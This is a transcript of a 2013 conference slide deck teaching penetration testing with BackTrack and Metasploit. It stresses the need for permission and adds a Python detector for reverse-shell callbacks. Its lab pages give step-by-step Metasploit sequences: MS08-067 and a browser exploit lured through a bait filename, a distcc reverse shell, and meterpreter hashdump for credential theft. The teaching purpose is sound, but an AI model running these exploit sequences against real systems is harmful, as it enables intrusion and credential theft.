[Slide] iCrOSS 2013_Pentest

Syarif

Nov 22, 2014
Transcript
Page 1: iCrOSS 2013_Pentest

PENETRATION TESTING AND METASPLOIT BASIC

Presented by Syarif

Indonesia Creative Open Source Software ( ICrOSS ) 2013

Jakarta, April 25 2013 Balai Kartini

Page 2: iCrOSS 2013_Pentest

Agenda

• Why & What’s Penetration Testing ( Pentest )

• << back|track basic overview

• Information Gathering & Port Scan ( Demo)

• Metasploit Basics & Meterpreter

• Challenge ;)

Page 3: iCrOSS 2013_Pentest

Whoami

• Just myself : http://fl3x.us ; @fl3xu5

• InfoSec Enthusiast & Trainer

• Lecturer & Assistant Manager

• CyberCrime Investigator

Page 4: iCrOSS 2013_Pentest

Why Pentest ?

• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)

• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)

Page 5: iCrOSS 2013_Pentest

What’s Penetration Testing

• A method to evaluate the security of a computer system / network

• Practice ( attacking ) an IT system like a ‘hacker’ does

• Find security holes ( weaknesses )

• Bypass security mechanisms

• Compromise an organization’s IT system security

You must have permission from the IT system owner !

Illegal activity puts you in jail

Page 6: iCrOSS 2013_Pentest

Ethics

• Think before act

• Don’t be stupid

• Don’t be malicious

Page 7: iCrOSS 2013_Pentest

Pentest Phases

Information Gathering → Vulnerability Analysis → Exploitation → Post Exploitation → Reporting

Page 8: iCrOSS 2013_Pentest

<< back|track overview

• The Most Advanced Linux Security Distribution

• Open Source & Always Will Be

• Developed for Security Professionals

• Real World Pentesting Tools

Page 9: iCrOSS 2013_Pentest

<< back|track overview

• Watch the Video ! :)

Page 10: iCrOSS 2013_Pentest

<< back|track overview

Page 11: iCrOSS 2013_Pentest

<< back|track overview

Page 12: iCrOSS 2013_Pentest

What’s Metasploit

• Not just a tool, but an entire framework *1)

• An open source platform for writing security tools and exploits *2)

• Easily build attack vectors by combining its exploits, payloads and encoders

• Create and execute more advanced attacks

• Ruby based

Page 13: iCrOSS 2013_Pentest

Metasploit interfaces

• MSFconsole

• MSFcli

• msfweb, msfgui ( discontinued )

• Metasploit Pro, Metasploit Express

• Armitage

Page 14: iCrOSS 2013_Pentest

MSFconsole

Page 15: iCrOSS 2013_Pentest

MSFcli

Page 16: iCrOSS 2013_Pentest

Metasploit Terminology

• Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)

• Payload : code that we want the target system to execute ( a few commands to be executed on the target system ) *1)

• Shellcode : a set of instructions used as the payload when exploitation occurs *1)

• Module : a piece of software that can be used by Metasploit *1)

• Listener : a component that waits for an incoming connection *1)

Page 17: iCrOSS 2013_Pentest

How does exploitation work

attacker → exploit + payload → vulnerable server

1. The attacker sends the exploit + payload to the vulnerable server

2. The exploit runs, then the payload runs

3. Upload / download data
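Step 2 above has a network footprint: with a reverse_tcp payload (the kind the demo slides use), the victim opens a new connection back to the attacker's LHOST seconds after the attacker's inbound connection to the vulnerable service. The detector below, an added example that is not part of the original slides, looks for that inbound-then-callback pair in constructed flow records; the IP addresses are the lab addresses from the slides, while port 4444 (Metasploit's default LPORT) and all timestamps are assumptions made up for the sample.

```python
from datetime import datetime, timedelta

# Constructed flow log (not from the slides). Format: time src sport dst dport.
# Lines 1-2: attacker 172.16.150.169 hits SMB (445) on the XP box, which calls
# back to port 4444 two seconds later (the reverse_tcp pattern).
# Lines 3-4: the Windows 7 box browses to the attacker on 80 and 443; both
# flows are outbound from the victim, so this rule does not match them.
# Lines 6-7: an SMB connection followed by a callback ten minutes later,
# outside the correlation window, so it is not flagged.
SAMPLE_FLOWS = """\
2013-04-25T10:00:01 172.16.150.169 51234 172.16.150.165 445
2013-04-25T10:00:03 172.16.150.165 1041 172.16.150.169 4444
2013-04-25T10:05:10 172.16.150.170 49155 172.16.150.169 80
2013-04-25T10:05:12 172.16.150.170 49156 172.16.150.169 443
2013-04-25T10:07:00 172.16.150.171 33000 172.16.150.1 53
2013-04-25T10:20:01 172.16.150.169 51300 172.16.150.167 445
2013-04-25T10:30:00 172.16.150.167 1050 172.16.150.169 4444
"""


def parse_flows(text):
    """Parse 'time src sport dst dport' lines into (datetime, src, sport, dst, dport)."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return flows


def find_callbacks(flows, window=timedelta(seconds=60)):
    """Return (victim, attacker, service_port, callback_port, seconds) for every
    victim->attacker connection that follows an attacker->victim connection
    within `window`. Flows are sorted by time so the scan can stop early."""
    flows = sorted(flows)
    hits = []
    for i, (t_in, attacker, _, victim, svc_port) in enumerate(flows):
        for t_out, src, _, dst, cb_port in flows[i + 1:]:
            if t_out - t_in > window:
                break  # everything after this is too late to be a callback
            if src == victim and dst == attacker:
                delay = int((t_out - t_in).total_seconds())
                hits.append((victim, attacker, svc_port, cb_port, delay))
    return hits


if __name__ == "__main__":
    for victim, attacker, svc, cb, delay in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"{victim} called back to {attacker}:{cb} {delay}s after inbound on {svc}")
```

The window is the knob that trades detection of slow stagers against false positives from ordinary client/server chatter; the browser-driven Windows 7 case needs a different signal, since there the victim initiates both connections.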

Page 18: iCrOSS 2013_Pentest

Traditional Pentest Vs Metasploit

Traditional Pentest :

Public Exploit Gathering → Change offsets → Replace ShellCode → Execute

Metasploit for Pentest :

Load Metasploit → Choose the target OS → Use exploit → SET Payload → Execute

Page 19: iCrOSS 2013_Pentest

Meterpreter

• Used as a payload after a vulnerability is exploited *1)

• Improves post exploitation

Page 20: iCrOSS 2013_Pentest

Meterpreter

Exploiting a vulnerability → Select meterpreter as the payload → meterpreter shell

Page 21: iCrOSS 2013_Pentest

Meterpreter command

Page 22: iCrOSS 2013_Pentest

Meterpreter command

Page 23: iCrOSS 2013_Pentest

Meterpreter command

Page 24: iCrOSS 2013_Pentest

Meterpreter command

Page 25: iCrOSS 2013_Pentest

Meterpreter command

Page 26: iCrOSS 2013_Pentest

Pentest Scenario

attacker → vulnerable OS on VMware *

* : Ubuntu 8.04 Metasploitable

Page 27: iCrOSS 2013_Pentest

Pentest Scenario

• Set network adapter : NAT

• Firewall & Windows update : OFF

• Fresh OS installed


• startx

Page 28: iCrOSS 2013_Pentest

OS in the Lab

• BackTrack 5 R3
  • IP address : 172.16.150.169

• Windows XP SP2
  • IP address : 172.16.150.165

• Windows 2003 Server
  • IP address : 172.16.150.167

• Windows 7
  • IP address : 172.16.150.170

• Ubuntu Linux 8.04 ( Metasploitable )
  • IP address : 172.16.150.171

Page 29: iCrOSS 2013_Pentest

Windows XP Exploitation

• msf > search windows/smb

• msf > info exploit/windows/smb/ms08_067_netapi

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > show payloads

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > exploit

• meterpreter > background

• msf exploit(ms08_067_netapi) > sessions -l

Page 30: iCrOSS 2013_Pentest

Windows XP Post Exploitation

• msf exploit(ms08_067_netapi) > sessions -i 1

• meterpreter > getsystem -h

• meterpreter > getuid

• meterpreter > hashdump

Page 31: iCrOSS 2013_Pentest

Windows 2003 Server Exploitation

• msf > search windows/smb

• msf > info exploit/windows/smb/ms08_067_netapi

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > show payloads

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > exploit

• meterpreter > background

• msf exploit(ms08_067_netapi) > sessions -l

Page 32: iCrOSS 2013_Pentest

Windows 7 Exploitation

• msf > use exploit/windows/browser/ms11_003_ie_css_import

• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms11_003_ie_css_import) > show options

• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169

• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80

• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi

• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169

• msf exploit(ms11_003_ie_css_import) > set LPORT 443

• msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim opens the URL http://172.16.150.169:80/miyabi-hot.avi

Page 33: iCrOSS 2013_Pentest

Windows 7 Exploitation

• msf exploit(ms11_003_ie_css_import) > sessions -l

• msf exploit(ms11_003_ie_css_import) > sessions -i 1

• meterpreter > sysinfo

• meterpreter > shell

Page 34: iCrOSS 2013_Pentest

Ubuntu 8.04 Metasploitable Exploitation

• search distcc

• use exploit/unix/misc/distcc_exec

• show payloads

• set PAYLOAD cmd/unix/reverse

• show options

• set rhost 172.16.150.171

• set lhost 172.16.150.169

• exploit

Page 35: iCrOSS 2013_Pentest

Any Questions ? Contact me

• Website : http://fl3x.us

• Twitter : @fl3xu5

Page 36: iCrOSS 2013_Pentest

Greets & Thanks To

• BackTrack Linux

• Metasploit Team ( HD Moore & Rapid7 )

• Offensive Security / Metasploit Unleashed

• David Kennedy

• Georgia Weidman

Page 37: iCrOSS 2013_Pentest

References

• 1. Metasploit: The Penetration Tester’s Guide : David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni

• 2. http://www.metasploit.com

• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page

• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines

Page 38: iCrOSS 2013_Pentest

Challenge in 45 minutes :)

• Connect your Windows OS to the TP-LINK access point over DHCP

• BackTrack 5 R3 VMware setting :

  • Network adapter : Bridged

• Get 4 pictures by yourself & shut down the targets ( if you can :p )

• Win the indobacktrack polo T-shirt

Page 39: iCrOSS 2013_Pentest

Challenge in 45 minutes :)